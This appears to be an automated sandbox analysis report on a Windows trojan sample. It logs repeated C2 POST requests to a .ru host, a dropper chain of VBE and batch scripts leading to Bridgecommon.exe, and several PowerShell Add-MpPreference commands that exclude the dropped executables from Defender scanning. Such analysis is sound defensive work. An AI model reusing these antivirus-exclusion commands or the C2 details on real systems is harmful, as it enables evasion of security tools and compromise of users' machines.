                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1252 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1024 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1272 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1016 Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1264 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1016 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1284 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 1260 Expect: 100-continue Connection: Keep-Alive
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 861848cm.nyashkoon.ru
                                    Source: unknown HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: powershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD67A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD56E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD603000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                    Source: powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                    Source: svchost.exe, 00000033.00000003.2014632536.00000216FD5D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CA6FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\EEEoXuLc.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: String function: 00CBEC50 appears 56 times
                                    Source: 3AAyq819Vy.exe, 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exe, 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 3AAyq819Vy.exe
                                    Source: 3AAyq819Vy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Bridgecommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@53/56@1/2
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CA6C74 GetLastError,FormatMessageW,0_2_00CA6C74
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CBA6C2
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\tYJQSSrA.log
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fMqIIZ3msKTluYQzOgJz
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\AppData\Local\Temp\ih0xhhgm
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: sfxname0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: sfxstime0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCommand line argument: STARTDLG0_2_00CBDF1E
                                    Source: 3AAyq819Vy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 3AAyq819Vy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: 3AAyq819Vy.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile read: C:\Users\user\Desktop\3AAyq819Vy.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\3AAyq819Vy.exe "C:\Users\user\Desktop\3AAyq819Vy.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknown Process created: C:\hyperContaineragent\Bridgecommon.exe C:\hyperContaineragent\Bridgecommon.exe
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknown Process created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: unknown Process created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent\Bridgecommon.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
